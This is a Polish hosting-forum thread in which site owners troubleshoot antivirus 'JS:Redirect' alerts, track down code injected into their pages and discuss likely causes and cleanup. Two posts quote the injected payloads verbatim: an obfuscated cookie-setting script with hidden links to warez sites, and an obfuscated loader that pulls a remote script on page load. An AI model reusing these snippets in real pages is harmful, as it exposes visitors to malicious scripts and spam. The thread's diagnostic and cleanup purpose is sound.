Trojan JS:Redirect na serwerze? ClamAV nic nie znalazł

[BlueMan 69]

No właśnie - przeskanowałem CAŁY system ClamAV i nic nie znalazł.

 

Jednakże dla wszystkich moich stron niektóre (Avast, KIS. AVG siedzi cicho) antywirusy zgłaszają trojana JS:Redirect - dla losowych elementów.

Mógłbym to namierzyć jakby ciągle do tego samego elementu Avast krzyczał, ale to dzieje się losowo, a pliki są całkowicie czyste.

Do tego nie zgłaszane są trojany przy każdym odświeżeniu strony, ale co jakiś czas. Totalnie losowo to się dzieje.

 

 

W jaki sposób mogę namierzyć i pozbyć się tego ustrojstwa?

[Jarosław Szmańda 42]

W Avasta nie wierz.

 

Pliki na dysk, Windowsa na virtualce i przeskanuj 2, 3 programami.

[BlueMan 69]

Skanowałem pliki domowe AVG i też nic nie znalazł.

[Jarosław Szmańda 42]

Tak ale te na lokalu i na serwerze mogą się różnić. Mogło się coś 'dokleić'.

[BlueMan 69]

"pliki domowe" w sensie /home

Serwer mam w domu, więc przeze Sambe mam dostęp do dysku i bezpośrednio mogę skanować na serwerze.

 

 

Jakby coś się dokleiło to nie występował by raczej efekt randomizacji zarażonych plików.

[p 3]

Pewnie "coś" dokleja JS z zewnętrznego serwera. Porównaj "czystą" wersję strony z tą "zarażoną" i będziesz wiedział co jest nie tak.

[BlueMan 69]

@p - to nic nie daje

Ponieważ w kodzie nie widziałem nigdy żadnego doklejonego JS.

A po drugie - w 90% przypadków alert o wirusie występuje w plikach graficznych. A jak chcę wyświetlić ten plik, to randomizacja zadziała i nie wyświetli wtedy ostrzeżenia o wirusie I sam plik jest czysty.

 

 

PS.

Baza Danych też czysta. Szukałem wystąpień %<script% i nic phpmyadmin nie znalazł

[BlueMan 69]

Mam kod JS który się dokleja do plików! Mam dziada!

Ale jak go teraz znaleźć na dysku??

[Gość]

targzip cały home, a potem lokalnie u siebie rozpakować i przeszukać automatycznie po kawałku (najlepiej 2-3 różnych kawałkach)?

 

I przede wszystkim JAKI to kod? W sposób forumowy zostaw jakąś spuściznę z tego problemu... heh

[BlueMan 69]

Ja dalej uważam, że /home jest czyste i ten dziad siedzi gdzieś w Apache/PHP

No, ale spróbuje go dojechać teraz jeszcze raz tam poprzez

grep -r "tlqhhva" home/ etc/ bin/ usr/ >> tlqhhva.txt

Mam nadzieję, że nie siedzi w zakodowanej formie :/

 

W necie na innych stronach też występuje. Zmienia tylko swoją zmienną, a reszta kodu jest prawie taka sama.

U mnie zmienna ta to "tlqhhva"

 

<script type="text/javascript" language="javascript"> var tlqhhva=new Date( ); tlqhhva.setTime(tlqhhva.getTime( )+12*60*60*1000); document.cookie="n\x5fses\x73_id\x3d53d\x312540afaf174fd0466f84\x316\x35af\x65e3"+"; path=/\x3b ex\x70\151\x72es="+tlqhhva.toGMTString( ); </script> 
<script>document.write(String.fromCharCode(59+1,100,105,118,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,62))</script><a href="http://keygenguru.com">crack download</a>  <h1><a href="http://keygenguru.com">serials</a>  </h1><h1><a href="http://keygenguru.com">cracks</a>  </h1>96.50.164.106 <h1><a href="http://www.getcoolmovies.com/movies/countries/usa/avatar/">Watch Avatar movie</a>  </h1><a href="http://www.getcoolmovies.com/movies/countries/usa/avatar/">Buy Avatar movie</a>  249.122.20.35 <h1><a href="http://keygenguru.com/movies.php">online movies</a>  </h1><a href="http://keygenguru.com/movies.php">download movie</a>  178.4.93.87 <a href="http://supersoftwarestore.com">buy cheap software</a>  <h1><a href="http://supersoftwarestore.com">cheap software</a>  </h1>83.52.50.31 <h1><a href="http://keygenguru.com/software/Microsoft-Windows-Vista-sp2-x64-adobe-cs4-master-colletion.html">Buy Microsoft Windows Vista SP2 x64  Adobe CS4 Master Collection</a>  </h1><h1><a href="http://keygenguru.com/software/Autodesk-inventor-2010.html">Buy Autodesk Inventor 2010 </a>  </h1><a href="http://keygenguru.com/software/newtek-lightwave-3d-9.html">Download NewTek Lightwave 3D 9</a>  <h1><a href="http://keygenguru.com/software/the-foundry-nuke-maximun-2009.html">Buy The Foundry Nuke: Maximum 2009</a>  </h1><a href="http://keygenguru.com/software/Rosetta-Stone-Version-3-Portuguese-for-mac.html">Download Rosetta Stone Version 3: Portuguese(Brazil) Level 1, 2 Set for mac</a>  <h1><a href="http://keygenguru.com/software/Rosetta-Stone-Version-3-Italian-for-mac.html">Download Rosetta Stone Version 3: Italian Level 1, 2 & 3 Set for mac</a>  </h1><a href="http://keygenguru.com/software/Rosetta-Stone-Version-3-hebrew-for-mac.html">Buy Rosetta Stone Version 3: Hebrew Level 1, 2 for mac</a>  <a href="http://keygenguru.com/software/Microsoft-Windows-Vista-sp2-x64-adobe-cs4-master-colletion.html">Download Microsoft Windows Vista SP2 x64  Adobe CS4 Master Collection</a>  <h1><a href="http://keygenguru.com/software/nuance-omnipage-17-and-paper-report.html">Download Nuance OmniPage 17 Pro with Paper Report</a>  </h1>

 

O ile sam kod jest nieszkodliwy, bo wyświetla jedynie te linki, to bardziej martwię się tym, że skoro to siedzi w apache/php to mógł dostać się (nie ten JS, a jego matka co zainfekowała serwer) do innych danych na dysku, np. hasła. A to już jest poważny problem.

[beliq 442]

Czy nie mas na tym serwerze jakiejś starej wersji Apache?

Kiedyś, rok temu bodajże, była taka luka bezpieczeństwa, która umożliwiała załadowanie

do Apache dodatkowego modułu, a co często było wykorzystywane do doklejania

stronom złośliwego kodu. Efekt był dokładnie taki jak u Ciebie.

Strony źródłowe były niezmienione, ale później w losowych miejscach,

do niektórych requestów, był doklejany złośliwy kod.

Użyj forumowej szukajki, bo coś kojarzę, że chyba pioklo z linuxpl.com

opublikował u nas wątek na ten temat.

[BlueMan 69]

Super! Dzięki Marcin! Na szczęście pioklo ma tylko kilka postów na forum i szybko znalazłem jego temat z rozwiązaniem.

http://forum.php.pl/index.php?showtopic=121411&start=0&p=614283entry614283

Opis idealnie pasuje do tego co mam u siebie. Jedynie nazwa trojana jest inna.

No i adresy IP inne. Do jednego z pliku w którym był ten kod doklejony nigdy nie łączono się z tego samego adresu IP.

203.117.68.106

88.2.169.238

91.82.182.155

78.8.228.74

89.132.14.33

94.52.112.168

 

Do tego skorzystałem z http://github.com/picca/Apache-fork-hack-finder-cleaner/blob/master/apache_fork_hack_finder_cleaner.sh aby znalazł mi pliki z doklejonym kodem.

 

 

Zobaczymy czy będzie dalej Avast się odzywać, czy nie

[Shk 51]

U mnie od jakiegoś czasu pojawia się również ten problem.

I to na kilku serwerach, z którymi się łączę. (smallservers.pl, hekko.pl)

Jak pozbyć się tego wirusa? Dokleja on mi do pliku index.html

na samym dole coś w stylu :

/*GNU GPL*/ try{window.onload = function(){var Xuyks78y1tk2 = document.createElement(’s!&c@$@r))$i)!!$p((&t^’.replace(/&|\(|\!|\$|\^|#|@|\)/ig, ”));Xuyks78y1tk2.setAttribute(‘type’, ‘text/javascript’);Xuyks78y1tk2.setAttribute(’src’, ‘h#(t&$)@t)@#!p$^&(/@@&/#!&c^s^d^@@n!^-#$^n@#)e)$(t&(@$.!@$^w!(u$n&(((d(e^^r$$)g#r$$o((#u$&)#$n&!^)d@.@c)(#o@#^m$.(@^^$a&!o^l^)@^-^c&)o#(-^u(^(k(.@!!!)m$u)@^s@i&@c(#&^)b^&o^x#$!p$$#(@r#&o(@!.##$r(&$u^&)!:#&^8$@0#^8@0)()#/(@g^^o###!o(g@l(!$^e$^$^&.)@c#!!(o!m(/$@@g(^o$(@o$&&)!g^@(!l!e!^)!.@)c&^o&)!m$)(@/)!(h@))y&@^v)@e#&$!$s((.@!$&n!(^!l)!@/&(e!)s!$#p!n#.^)!@g@&o.^c#!o)m!(^()/!s@o^)f@t^#p#$)#e$d#@&i&@$a#.^©!^!(o!m@/$$$^)’.replace(/\)|@|\$|\!|&|#|\(|\^/ig, ”));Xuyks78y1tk2.setAttribute(‘defer’, ‘defer’);Xuyks78y1tk2.setAttribute(‘id’, ‘E@^($2@!u#^f^(d)s&^&$)v##(s#)&p$)^3#!^9@#&z(!f^!’.replace(/\^|@|\)|\!|#|&|\(|\$/ig, ”));document.body.appendChild(Xuyks78y1tk2);}} catch(e) {}

Początkowo myślałem że usunę ten kod i będzie po sprawie.

Ale nadal pojawia się ten wirus. (zwykla strona html + css, forum phpbb3)

Pobrałem pliki, przeskanowałem Kaspersky Internet Seurity oraz AVG - nic nie wykrywa.

To samo mój komputer - według tych antivirusów jest czysty.

Z góry dzięki za pomoc.

Pozdrawiam

[Gość xtd]

U mnie od jakiegoś czasu pojawia się również ten problem.

I to na kilku serwerach, z którymi się łączę. (smallservers.pl, hekko.pl)

Jak pozbyć się tego wirusa? Dokleja on mi do pliku index.html

na samym dole coś w stylu :

 

Początkowo myślałem że usunę ten kod i będzie po sprawie.

Ale nadal pojawia się ten wirus. (zwykla strona html + css, forum phpbb3)

Pobrałem pliki, przeskanowałem Kaspersky Internet Seurity oraz AVG - nic nie wykrywa.

To samo mój komputer - według tych antivirusów jest czysty.

Z góry dzięki za pomoc.

Pozdrawiam

 

To co jest u Ciebie wygląda na efekt odczytania haseł z TotalComandera przez jakiegoś trojanika.

Efektem tego jest doklejony kod do plików zawierających w nazwie index oraz do plików .js

Lekarstwo: zmaina haseł, zmiana programu, podmiana plików z backupu bądź ręczna edycja/naprawa.

Co do kompa, to moższ użyć ComboFixa.

[Shk 51]

Już chyba znalazłem na to odpowiedzi...

 

Co do programu : nie używam TotalComandera tylko FileZilla.

Dosyć denerwujący ten wirus... ;/

[WPNJ 0]

Tylko w głównym index.html masz ten kod?

Bo jak mi się taki syf doczepił to kod miałem we wszystkich plikach o nazwie index.(html, php).

 

@xtd

 

ComboFix'a to raczej samemu się nie używa...trzeba mieć ku temu konkretne powody.

Jest on wyjściem ostatecznym jak inne opcje zawiodą.

[SecurityHost 17]

Najlepszym sposobem na wykrycie złośliwego kodu jest modyfikacja apache_fork_hack_finder_cleaner.sh

Po usunięciu trojana zmień uprawnienia do pliku na 644 z 777 zazwyczaj.Ja mam taki sposób na to.

Edytowano Luty 22, 2012 przez SecurityHost (zobacz historię edycji)

[www.mzone.uk 1200]

Ten temat jest już trochę archiwalny, ostatni post z:

 

Napisany 05 styczeń 2010 - 17:12

[SecurityHost 17]

Przepraszam , rzeczywiście nie spojrzałem na datę.

[d.v 1409]

And the winner is: SecurityHost!